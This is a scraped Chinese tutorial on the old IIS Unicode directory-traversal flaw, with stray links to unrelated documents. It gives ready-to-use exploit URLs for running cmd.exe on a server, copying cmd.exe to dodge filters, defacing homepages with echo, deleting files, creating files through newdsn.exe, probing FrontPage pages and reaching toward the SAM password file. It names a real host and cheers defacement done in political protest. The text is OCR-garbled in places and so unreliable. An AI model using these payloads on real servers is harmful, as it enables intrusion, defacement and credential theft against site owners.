UNICODE漏洞一

合集下载

instrusion

instrusion
http://172.18.25.109/scripts/..%c0%2f../winnt/sy stem32/cmd.exe?/c+del+c:\inetpub\wwwroot\def ault.asp
利用Unicode漏洞删除主页
拷贝文件
为了是使用方便,利用语句将cmd.exe文件拷贝到 scripts目录,并改名为c.exe,使用的语句是: http://172.18.25.109/scripts/..%c0%2f../winnt/syste m32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe +c.exe 程序执行结果如图5-24所示。
查看C盘的目录
以后使用cmd.exe命令就方便了,比如查看C盘的目录, 使用的语句就可以简化为:
http://172.18.25.109/scripts/c.exe?/c+dir+c:\
执行的结果如图5-25所示。
Unicode漏洞是 漏洞是2000-10-17发布的,受影响的版本: 发布的,受影响的版本: 漏洞是 发布的 Microsoft IIS 5.0+Microsoft Windows 2000系列版本 系列版本 Microsoft IIS 4.0+ Microsoft Windows NT 4.0
消除该漏洞的方式是安装操作系统的补丁, 消除该漏洞的方式是安装操作系统的补丁,只要安装 以后, 了SP1以后,该漏洞就不存在了。微软 以后 该漏洞就不存在了。微软IIS 4.0和5.0 和 都存在利用扩展UNICODE字符取代 字符取代"/"和"\"而能利 都存在利用扩展 字符取代 和 而能利 目录遍历的漏洞。 用"../"目录遍历的漏洞。 目录遍历的漏洞

Web应用中常见39种不同的安全漏洞漏洞分析及检查方法

Web应用中常见39种不同的安全漏洞漏洞分析及检查方法

Web应用中常见39种不同的安全漏洞漏洞分析及检查方法1.1SQL注入漏洞风险等级:高危漏洞描述:SQL注入漏洞产生的原因是网站应用程序在编写时未对用户提交至服务器的数据进行合法性校验,即没有进行有效地特殊字符过滤,导致网站服务器存在安全风险,这就是SQL Injection,即SQL注入漏洞。

漏洞危害:1) 机密数据被窃取;2) 核心业务数据被篡改;3) 网页被篡改;4) 数据库所在服务器被攻击从而变为傀儡主机,导致局域网(内网)被入侵。

修复建议:1)在网页代码中对用户输入的数据进行严格过滤;(代码层)2)部署Web应用防火墙;(设备层)3)对数据库操作进行监控。

(数据库层)代码层最佳防御sql漏洞方案:采用sql语句预编译和绑定变量,是防御sql注入的最佳方法。

原因:采用了PreparedStatement,就会将sql语句:"select id, no from user where id=?" 预先编译好,也就是SQL引擎会预先进行语法分析,产生语法树,生成执行计划,也就是说,后面你输入的参数,无论你输入的是什么,都不会影响该sql语句的语法结构了,因为语法分析已经完成了,而语法分析主要是分析sql命令,比如select ,from ,where ,and, or ,order by 等等。

所以即使你后面输入了这些sql命令,也不会被当成sql命令来执行了,因为这些sql命令的执行,必须先的通过语法分析,生成执行计划,既然语法分析已经完成,已经预编译过了,那么后面输入的参数,是绝对不可能作为sql命令来执行的,只会被当做字符串字面值参数,所以sql语句预编译可以防御sql注入。

其他防御方式:正则过滤1.2目录遍历漏洞风险等级:中危漏洞描述:通过该漏洞可以获取系统文件及服务器的配置文件。

利用服务器API、文件标准权限进行攻击。

漏洞危害:黑客可获得服务器上的文件目录结构,从而下载敏感文件。

unicode漏洞

unicode漏洞

Unicode漏洞是攻击者可通过IE浏览器远程运行被攻击计算机的cmd.exe文件,从而使该计算机的文件暴露,且可随意执行和更改文件的漏洞。

Unicode标准被很多软件开发者所采用,无论何种平台、程序或开发语言,Unicode均为每个字符提供独一无二的序号,如向IIS服务器发出包括非法Unicode UTF-8序列的URL,攻击者可使服务器逐字“进入或退出”目录并执行任意程序,该攻击即称为目录转换攻击。

Unicode用“%2f”和“%5c”分别代表“/”和“\”字符,但也可用“超长”序列来代替这些字符。

“超长”序列是非法的Unicode表示符,如用“%c0%af”代表“/”字符。

由于IIS不对超长序列进行检查,因此在URL中添加超长的Unicode 序列后,可绕过微软的安全检查,如在一个标记为可执行的文件夹发出该请求,攻击者即可在服务器上运行可执行文件。

一、UNICODE漏洞的原理此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。

中文版的WIN2000中,UNICODE编码存在BUG,在UNICODE 编码中%c1%1c -〉(0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ‘/‘%c0%2f -〉(0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ‘\‘http://ip地址/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\二、UNICODE漏洞的检测以下均以中文版WIN2K为例,如果是其他NT版本,按上面所述的编码替换以下代码中的%c1%1c最简单的检测方法:比如说有一IP地址为X.X.X.X的WIN2K主机,我们可以在地址栏输入x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir如果存在此漏洞的话,我们便可以看到以下的内容:(例子假设SCRIPTS目录里无文件)Directory of C:\inetpub\scripts2000-09-28 15:49 〈DIR〉.2000-09-28 15:49 〈DIR〉..这是我们在很多经验交谈中常看到大家使用的方法,实际上我们也可以改为这样127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/r+dir即r=c 这个字母的取代,在本文发表之前,网络里没有介绍过,关于r这字母可以等效于c,我们可以通过cmd/?可以得到解释。

信息安全(填空)

信息安全(填空)

第一章1、信息安全受到的威胁有人为因素的威胁和非人为因素的威胁,非人为因素的威胁包括自然灾害、系统故障、技术缺陷。

2、广义的信息安全是指网络系统的硬件、软件及其系统中的信息受到保护。

它包括系统连续、可靠、正常地运行,网络服务不中断,系统的信息不因偶然的或恶意的原因而遭到破坏、更改、和泄露。

3、导致网络不安全的根本原因是系统漏洞、协议的无效性和人为因素。

4、OSI安全体系结构中,五大类安全服务是指认证、访问控制、数据保密、数据完整性服务和抗否认性服务。

5、网络通信中,防御信息被窃取的安全措施是加密技术;防御传输消息被篡改的安全措施是完整性技术;防御信息被假冒的安全措施是认证技术;防御信息被抵赖的安全措施是数字签名技术。

6、信息安全保障体系架构由管理体系、组织结构体系和技术体系。

第二章1、密码学是一门关于信息加密和密文破译的科学,包括密码编码学和密码分析学两门分支。

2、对于一个密码体制而言,如果加密密钥和解密密钥相同,则称为对称密码体制;否则,称为非对称密码体制。

前者也称为单密钥体制,后者也称为双密钥体制。

3、柯克霍夫原则是指原密码系统的安全性取决于密钥,而不是密码算法。

这是荷兰密码学家kerckhoff在其名著《军事密码学》中提出的基本假设。

遵循这个假设的好处是,它是评估算法安全性的唯一可用的方式、防止算法设计者在算法中隐藏后门、有助于推广使用。

4、分组密码的应用模式分为电子密码本、密文链接模式、密文反馈模式、输出反馈模式。

5、加密的方式有节点加密、链路加密、端到端加密。

6、DES分组长度是64位,密钥长度是64位,实际密码长度是54位。

第三章1、信息隐藏技术的4个主要分支是信息隐写术、隐通道、匿名通信、版权标识。

2、信息隐藏的特性指安全性、鲁棒性、不可检测性、透明性和自恢复性。

3、数字水印技术是利用人类视觉和听觉的冗余特性,在数字产品中添加某些数字信息,以起到版权保护的作用。

4、通用的数字水印算法包括水印生成算法、水印嵌入和提取检测三个方面。

Unicode漏洞的攻击与防御

Unicode漏洞的攻击与防御

中图分 类号  ̄P0 - 39 T
文献标识码 : A
文章编号 :08— 6 12o )9 0 7 0 10 48 【060 — 02— 5
Th t c n ee s fUnc d o h l ea t k a d d fn eo io el p oe a o
删 Da n
文 丹
( 长沙大学计算机科学 与技术 系,湖南 长沙 400 ) 103 摘 要 : 着网络攻击事件的频繁发 生 , 随 如何保护 系统并有效防御 攻击成为 系统安全 的主要 问题 . 对 U i d 针 n oe漏洞屡 c
遭攻击这一现状 , 通过对 U i d 漏洞的详尽分析 , n oe c 例举 了对 U i d 漏洞进行攻击的方式和方 法, n oe c 根据 攻击的特点 , 系统 为 的安 全提 出了相 应的防御措施和安全策略 . 关键词 :n oe U i d 漏洞 ; c 代理服务 器;O 日志 LG
维普资讯
第 加 卷 第 5期 2006年 9月






V 1加 o.NoFra bibliotek 5J 0URNA CHA L OF NGS HA V SIY UNl日R T
S p.2006 e
Uid nc e漏 洞 的攻 击 与 防御 o
不 一样 :
其中 U i d 漏洞可以说 是当前最热 门的漏洞了, n oe c
原因就是 U i d 漏洞是最容易让入侵者得手的一 n oe c 个漏洞 . 网络上时时刻刻都有人对 U i e n e 漏洞进 c d 行扫描 、 监听 , 一旦发现存在 , 就可能入侵主机 , 从 而轻易地将主页改掉 , 除硬盘上的数据 , 删 甚至获 取 amn tt 权限达到控 制主机 的 目的等. d isa r iro 做好 U i d 漏洞防御才能做好系统的安全策略. n oe c

网络安全与管理第3版课后习题答案

网络安全与管理第3版课后习题答案

第1章网络安全概述与环境配置1. 网络攻击和防御分别包括哪些内容?答:攻击技术主要包括以下几个方面。

(1)网络监听:自己不主动去攻击别人,而是在计算机上设置一个程序去监听目标计算机与其他计算机通信的数据。

(2)网络扫描:利用程序去扫描目标计算机开放的端口等,目的是发现漏洞,为入侵该计算机做准备。

(3)网络入侵:当探测发现对方存在漏洞后,入侵到目标计算机获取信息。

(4)网络后门:成功入侵目标计算机后,为了实现对“战利品”的长期控制,在目标计算机中种植木马等后门。

(5)网络隐身:入侵完毕退出目标计算机后,将自己入侵的痕迹清除,从而防止被对方管理员发现。

防御技术主要包括以下几个方面。

(1)安全操作系统和操作系统的安全配置:操作系统是网络安全的关键。

(2)加密技术:为了防止被监听和数据被盗取,将所有的数据进行加密。

(3)防火墙技术:利用防火墙,对传输的数据进行限制,从而防止被入侵。

(4)入侵检测:如果网络防线最终被攻破,需要及时发出被入侵的警报。

(5)网络安全协议:保证传输的数据不被截获和监听。

2. 从层次上,网络安全可以分成哪几层?每层有什么特点?答:从层次体系上,可以将网络安全分成4个层次上的安全:物理安全,逻辑安全,操作系统安全和联网安全。

物理安全主要包括5个方面:防盗,防火,防静电,防雷击和防电磁泄漏。

逻辑安全需要用口令、文件许可等方法来实现。

操作系统安全,操作系统必须能区分用户,以便防止相互干扰。

操作系统不允许一个用户修改由另一个账户产生的数据。

联网安全通过访问控制服务和通信安全服务两方面的安全服务来达到。

(1)访问控制服务:用来保护计算机和联网资源不被非授权使用。

(2)通信安全服务:用来认证数据机要性与完整性,以及各通信的可信赖性。

(感觉如果说是特点的话这样回答有点别扭。

)3. 为什么要研究网络安全?答:网络需要与外界联系,同时也就受到许多方面的威胁:物理威胁、系统漏洞造成的威胁、身份鉴别威胁、线缆连接威胁和有害程序威胁等。

IIS unicode漏洞完整攻略

〈DIR〉 wcount 9 File(s) 935,233 bytes
(2) 我们也可以利用此BUG得到一些系统文件的内容
http://192.168.8.48/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
IIS 将把它当作 a .ASP 文件提交.它将让 asp.dll 来打开文件win.ini
主页面就被修改成了:
Hacked by Lion
20/10/2000
也就是说,已经把他的主页黑了。
:P
下面是一些解释。
其中echo 是一个回显命令。
你在DOS下打一个echo Hacked by Lion 看看。
它是在屏幕上显示
Hacked by Lion
不只这样
你也可以让它把东西写进一个文件。
echo Hacked by Lion > lion.txt
这样当前目录下的lion.txt文件里就有了Hacked by Lion的字样。
其中 > lion.txt的用途是把回显的字符写进lion.txt,它覆盖原来的内容。
你如果再想用echo 20/10/2000 > lion.txt 来写剩下的内容的话,
如果用 IIS 4.0+SP6(中文版), 将不能测试成功 但是我们能用下列方法得到。
http://192.168.8.100/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini
"default.asp" 是一个存在的 .ASP 文件, "a.exe" 是一个随机的 .EXE 文件名. 它可以不存在。

unicode漏洞的基本原理

unicode漏洞的基本原理
Unicode漏洞是一种利用Unicode编码的软件漏洞,允许攻击者在计算机系统中注入恶意代码或进行其他形式的攻击。

这种漏洞的基本原理是利用Unicode编码中的多种字符集,以及Unicode在不同操作系统和浏览器中的解释方式不一致的特点,在输入字符时混入特定的Unicode字符,从而影响程序的正常行为。

攻击者可以利用这种漏洞,欺骗用户点击链接或下载附件,使其打开恶意代码,进而攻击目标系统并窃取敏感信息。

为了保护自己的计算机系统和数据安全,用户需及时更新系统补丁,安装杀毒软件和防火墙,并谨慎对待不明来源的链接和文件。

黑客术语大全

黑客术语大全1,肉鸡:所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以是大型的服务器,我们可以象操作自己的电脑那样来操作它们,而不被对方所发觉.2,木马:就是那些表面上伪装成了正常的程序,但是当这些被程序运行时,就会获取系统的整个控制权限。

有很多黑客就是热中与使用木马程序来控制别人的电脑,比如灰鸽子,黑洞,PcShare等等。

3,网页木马:表面上伪装成普通的网页文件或是将而已的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。

4,挂马:就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里,以使浏览者中马。

5,后门:这是一种形象的比喻,**者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置。

这些改动表面上是很难被察觉的,但是**者却可以使用相应的程序或者方法来轻易的与这台电脑建立连接,重新控制这台电脑,就好象是**者偷偷的配了一把主人房间的要是,可以随时进出而不被主人发现一样.通常大多数的特洛伊木马(Trojan Horse)程序都可以被**者用语制作后门(BackDoor)6,rootkit:rootkit是攻击者用来隐藏自己的行踪和保留root(根权限,可以理解成WINDOWS下的system或者管理员权限)访问权限的工具。

通常,攻击者通过远程攻击的方式获得root访问权限,或者是先使用密码猜解(破解)的方式获得对系统的普通访问权限,进入系统后,再通过,对方系统内存在的安全漏洞获得系统的root权限。

然后,攻击者就会在对方的系统中安装rootkit,以达到自己长久控制对方的目的,rootkit与我们前边提到的木马和后门很类似,但远比它们要隐蔽,黑客守卫者就是很典型的rootkit,还有国内的ntroorkit等都是不错的rootkit工具。

UNICODE编码漏洞全攻略-1

2000-08-06 19:16
.
2000-08-06 19:16
..
(以下内容略)
19 File(s) 1,233,840 bytes
2 Dir(s) 6,290,644,992 bytes free
如果漏洞和目录同时存在的话,你就可以在WEB页上看到相对应的目录里的一切内容。这仅是对单一目标主机的漏洞检测,如果想对某一IP段上的NT主机做UNICODE漏洞的检测,我们就需要使用类似以下的扫描软件。
服务器上运行。
三、UNICODE编码漏洞简单利用的命令
一般情况下我们用
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
看到的目录是空的:(例如)
Directory of C:\inetpub\scripts
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>scaniis.log");
print OUT "\n$host[$a] : $response->content";
(
/technet/security/bulletin/ms00-057.asp)
可以从如下地址下载补丁:
IIS 4.0
/ntserver/nts/downloads/critical/q269862/default.asp
以下的源码是外国黑客写的,当然就只扫描英文版的NT,要扫描中文版的,需要做相应的修改。
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

UNICODE漏洞一UNICODE 漏洞☆发现/scrits/tools/newdsn.exe漏洞newdsn.exe :一个存在于/scrits/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件。

1.创建文件:htt://xxx.xxx.xxx.xxx/scrits/tools/newdsn.exe?driver=Microsoft%2BAcces s%2BDriver%2B%28*.mdb%29&am;dsn=Evil2+samles+from+microsoft& am;dbq=..%2F..%2Froot%2Fevil2.htm&am;newdb=CREATE_DB&am;attr=☆发现/_vti_bin/shtml.dll漏洞shtml.dll在Frontage Extention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地径信息. 但是如果我们请求并非HTML、SHTML或者AS后缀的文件我们将会得到不同的信息. htt://TrustedServer如果用户上述指定的链接脚本将通过HTT请求从客户端传送给可信任的站点可信任站点然后将该脚本作为错误信息的一部分返回给客户端。

客户端在收到包含该脚本的出错页面时将执行该脚本并将赋予来自可信任站点的内容的所有权力赋予该脚本。

另外shtml.dll对较长的带html后缀的文件名都会进行识别和处理利用这一点可以对IIS服务器执行DOS攻击以下这个程序能使目标服务器的CU占用率达到100%并且耗用所有的应用程序空间。

系统在数分钟内会报告应用程序已满。

攻击方法:暴露径:htt:///_vti_bin/shtml.dll/something.html这样将返回以下信息:Cannot oen "d:\inetub\root\ostinfo1.html": no such file or folder.可信任站点执行脚本:使用如下格式的URL:htt://iis5server/_vti_bin/shtml.dll/;☆?ageServices漏洞是所有站都有的吧。

(至少什么浪的什么易的什么虎的)但是有好多人扫描出来但是不知道如何运用在此我给大家讲一下吧。

这个是可以显示页面清单的!运气好的话还可以得到用户名和密码!(都是明文的)方法是url/?ageServices还可以这样试试/?w-cs-dum /?w-ver-info /?w-html-rend /?w-usr-ro /?w-ver-diff/?w-verify-link /?w-start-ver /?w-sto-ver /?w-uncheckout☆nicode漏洞一直闹的很凶吧!!把下面的代码拷贝到浏览器里试试。

以后的就不用我在说了吧自己找nicode漏洞的教程吧。

如果不会就来“黑色之晴”论坛看看吧。

.tw/scrits/..%c19c../winnt/system32/cmd.exe?/c+dir+C:\Inetub\root这是显示的内容:Directory of C:\Inetub\root00/06/29 09:31a .00/06/29 09:31a ..99/06/01 08:33 8599/06/01 08:34 8699/06/01 08:33 8798/03/07 12:13a cgi-bin98/03/07 12:13a images99/05/23 11:14a kfjh99/05/19 09:56 samles98/03/07 12:13a _rivate10 File(s) 0 bytes915,182,592 bytes freehtt://.tw/scrits/..%c19c../winnt/system32/cmd.exe?/c+dir+C :\Inetub\root没错是个URL。

大家在来向下看看unicode的漏洞〈==菜鸟看看吧。

最近这些日子好多的WINNT的服务器被黑尤其是国内的。

下面是一些具体示例的总结。

下面这类型的漏洞以发现近一年多了一年多前在国外的黑客站就有了类似的文章但是当时并没有很多人重视。

,在反北约的黑客战中有很多就是用下面这些例子了。

不过直到UNICOUDE漏洞的发现黑NT 的计算机变的傻瓜化了。

下面我把最近的一些文章总结一下。

希望大家能从这里体会到点什么。

(下面的文章来自一些邮件列表和BBS)原理:(其实原来都很相似我拿这个做个例子。

)NSFOCUS安全小组发现IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞导致用户可以远程通过IIS执行任意命令。

当IIS打开文件时如果该文件名包含unicode 字符它会对其进行解码如果用户提一些特殊的编码将导致IIS错误的打开或者执行某些web根目录以外的文件。

对于IIS 5.0/4.0中文版当IIS收到的URL请求的文件名中包含一个特殊的编码例如"%c1%hh"或者"%c0%hh",它会首先将其解码变成:0xc10xhh 然后尝试打开这个文件Windows 系统认为0xc10xhh可能是unicode编码因此它会首先将其解码如果0x00<= %hh < 0x40的话采用的解码的格式与下面的格式类似:%c1%hh -> (0xc1 - 0xc0) * 0x40 + 0xhh%c0%hh -> (0xc0 - 0xc0) * 0x40 + 0xhh因此利用这种编码我们可以构造很多字符例如:%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'攻击者可以利用这个漏洞来绕过IIS的径检查去执行或者打开任意的文件。

(1) 如果系统包含某个可执行目录就可能执行任意系统命令。

下面的URL可能列出当前目录的内容:htt:///scrits/..%c1%1c../winnt/system32/cmd.exe?/c+dir (2) 利用这个漏洞查看系统文件内容也是可能的:htt:///a.as/..%c1%1c../..%c1%1c../winnt/win.iniRain Forest uy 测试发现对于英文版的IIS 4.0/5.0,此问题同样存在只是编码格式略有不同变成"%c0%af"或者"%c1%9c".下面我们的例子以%c1%1c为主讲解。

注:+号可以用%20代替,依这种格式你还可以构造出许多命令好多站点\inetub\下的scrits目录删除了但\rogram Files\Common Files\System\下的msadc还在(有msadcs.dll漏洞的话就不用%c1%1c了)。

这时可以如下构造请求:htt://i/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.ex e?/c+dir+c:\实践一:(修改----最简单化的一种)很多入侵都以修改的形式表现出来这通常有两种情况:一是表达自己的愤慨——比如当年以美国为首的北约悍然轰炸我驻南使馆的突发事件之后国内很多黑客在ICQ、BBS一呼百应纷纷对敌国进行各种形式的攻击当然以替换最为大快人心!二是在给管发e-mail 漏洞报告之后没反应有的黑客按耐不住就用修改的方式给予警告用以引起人们对于安全技术的重视。

当然说起来这是违法的啦所以大家要注意哦不要光图一时的痛快呵呵!可以使用ECHO命令、管道符等建立文件修改文件内容。

但因为IIS 加载程序检测到有CMD.EXE或者串就要检测特殊字符“&am;|(,;%<>”如果发现有这些字符就会返回500错误所以不能直接使用CMD.EEX加管道符等。

因此可以采用拷贝CMD.EXE换名的方法绕过去。

htt://xxx.xxx.xxx.xxx/scrits/..%c1%1c../winnt/system32/cmd.exe?/c+coy+ c:\winnt\system32\cmd.exe+c:\inetub\scrits\ccc.exe然后htt://xxx.xxx.xxx.xxx/scrits/ccc.exe?/c+echo+Hacked+by+chinese+>+f: \root\xxx\default.ashtt://xxx.xxx.xxx.xxx/scrits/ccc.exe?/c+echo+1/1/2001+>>+f:\root\ xxx\default.as就改了了!这种方法对于有负载均衡的主机很不方便又需要几次才能完成所以不好。

袁哥给出了另一种更方便的办法。

参考袁哥(yuange)的帖子《IIS不用拷贝CMD.EXE使用管道符等的方法》可以这样:htt://xxx.xxx.xxx.xxx/scrits/..%c1%1c../winnt/system32/cmd".exe? /c+echo+Hacked+by+hacker+>+f:\root\xxx\default.ashtt://xxx.xxx.xxx.xxx/scrits/..%c1%1c../winnt/system32/cmd".exe? /c+echo+12/1/2k+>>+f:\root\xxx\default.as这样就被更改成了:Hacked by hacker12/1/2k当然我是没有这样做啦不过这些东西我都在自己配置的环境下实现了在我练习的过程中发现用ECHO写这些的时候很慢如果你多次回车过一阵屏幕刷新后上就会留下多个你要写的内容。

注解:利用这个漏洞修改页面成一个漂亮一点的页面可以实现字对齐颜色的改变加上连接等。

其中的原理很简单就是按照html的格式。

但是要转换成Unicode码。

具体的蜘蛛在这里就不多说了。

有兴趣的大家可以试试看就和做页一样有趣实践二(下载SAM文件)htt://xxx.xxx.xxx.xxx/scrits/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\发现列出了远程主机C:\下的所有文件执行:htt://xxx.xxx.xxx.xxx/scrits/..%c1%1c../winnt/system32/cmd.exe?/c+coy%20c:\autoexec.bat%20c:\autoexec.bak 成功实现文件的复制执行:htt://xxx.xxx.xxx.xxx/scrits/..%c1%1c../winnt/system32/cmd.exe?/c+del%20c:\autoexec.bak 成功实现文件的删除哇!太利害了。

相关文档
最新文档